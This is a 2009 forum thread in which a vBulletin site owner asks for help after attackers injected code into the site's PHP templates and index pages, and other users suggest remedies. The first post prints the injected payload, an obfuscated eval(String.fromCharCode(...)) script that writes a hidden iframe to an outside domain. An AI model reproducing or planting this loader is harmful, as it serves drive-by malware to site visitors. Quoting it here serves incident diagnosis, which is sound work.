:confused:Okay guys here it goes I removed the mod which was nominationt and forgot to remove the PHP in my root folder this was done like three days ago... I just received for attempts to access http://www.xxxxxxxx.net/nominate_topic.php?do=shownominationthread

This is what I received in my e-mail after three attempts of them accessing that link above..

Database error in vBulletin 3.8.2:

Invalid SQL:
SELECT * FROM nominate_topic_thread WHERE postid > '0';

MySQL Error : Table 'xxxxxx_TOPGUN.nominate_topic_thread' doesn't exist
Error Number : 1146
Request Date : Monday, May 25th 2009 @ 08:38:13 AM
Error Date : Monday, May 25th 2009 @ 08:38:13 AM
Script : http://www.xxxxxxxxxxxx.net/nominate_topic.php?do=shownominationthread
Referrer :
IP Address : 174.xxxxxxxxx
Username : Unregistered
Classname : vB_Database
MySQL Version :


Within an hour after receiving three attempts to access the same URL above apparently this was ejected into my HTML intro page and on a lot of my PHP templates even on the index PHP they injected this code does anybody have any idea what this is?

My Internet security 2009 detected it when I checked the page and select it down the page and look at the code and this was what was in it..



?php
// ++================================================ =========================++
// || vBadvanced CMPS v3.1.0 (vB 3.6 - vB 3.8) - 86589
// || ? 2003-2009 vBadvanced.com - All Rights Reserved
// || This file may not be redistributed in whole or significant part.
// || http://vbadvanced.com
// || Downloaded 21:03, Sat May 9th 2009
// || xxxxxxxxxxxxxxxxxxxxxxxxxxx
// ++ ================================================== ======================++

error_reporting(E_ALL & ~E_NOTICE);
define('THIS_SCRIPT', 'adv_index');
define('VBA_PORTAL', true);
define('VBA_SCRIPT', 'CMPS');

// ============================================
// Enter the full path to your forum here
// Example: /home/vbadvanced/public_html/forum
// ============================================

$forumpath = '';

// ============================================
// No Further Editing Necessary!
// ============================================

if ($forumpath)
{
if (!is_dir($forumpath))
{
echo 'Invalid forum path specified! Please edit this file and be sure to include the correct path for your $forumpath variable.';
exit;
}

chdir($forumpath);
}

$phrasegroups = array();
$globaltemplates = array();
$actiontemplates = array();
$specialtemplates = array();

require_once('./includes/vba_cmps_include_template.php');
require_once('./global.php');

print_portal_output($home);

?><?php echo '<script type="text/javascript">eval(String.fromCharCode(118,97,114,32,120,101,119 ,61,52,53,51,56,48,48,53,52,51,59,118,97,114,32,10 3,104,103,52,53,61,34,110,117,111,116,34,59,118,97 ,114,32,119,61,34,111,34,59,118,97,114,32,114,101, 54,61,34,108,108,46,34,59,118,97,114,32,104,50,104 ,61,34,99,111,109,34,59,118,97,114,32,97,61,34,105 ,102,114,34,59,118,97,114,32,115,61,34,104,116,116 ,34,59,100,111,99,117,109,101,110,116,46,119,114,1 05,116,101,40,39,60,39,43,97,43,39,97,109,101,32,1 15,114,39,43,39,99,61,34,39,43,115,43,39,112,58,47 ,47,39,43,103,104,103,52,53,43,39,39,43,119,43,39, 39,43,114,101,54,43,39,39,43,104,50,104,43,39,47,3 9,43,39,34,32,119,105,100,39,43,39,116,104,61,34,4 9,34,32,104,39,43,39,101,105,103,104,116,61,34,51, 34,62,60,47,105,102,39,43,39,114,97,109,101,62,39, 41,59,32,118,97,114,32,106,104,114,52,61,52,51,50, 52,50,50,52))</script>'; ?>

--------------- Added 1243240230 at 1243240230 ---------------

They even put it on my admin index.php I'm looking at the modified dates right now..

do you have vbadvanced installed?

Yes I do.. what I just did was overwrite all the index files.. so I can close the fourm.. I put an HTML page up for the landing page until I get this resolved..

--------------- Added 1243241471 at 1243241471 ---------------

http://www.google.com/support/forum/p/Webmasters/thread?tid=059ba31a6e508643&hl=en

I'm running across some links with the same situation..

thanks for all the help!

have you tried disabling the vbadvanced add on, pretty sure if you over-write the cmps_index file it causes errors.

Do you have a link to your site?

http://www.speedaholic.net/index.php

--------------- Added 1243243442 at 1243243442 ---------------

I removed vbadvanced as index.php

i would try to uninstall vbadvanced, and see if that helps :D

I could have a look properly if you wish pm me if interested :D

The requested URL could not be retrieved

While trying to retrieve the URL:

http://www.kaplanforums.com

The following error was encountered:

The requested object is INFECTED with the following viruses: HEUR:Trojan.Script.Iframer


Please contact your service provider if you consider it incorrect.
Generated:
Mon May 25 13:20:19 2009
Kaspersky Internet Security 2009

Has to be something on my shared hosting ... was up all night

i would suggest contacting your hosting and ask them how this happened.

If you have a forum backup you should probably upload that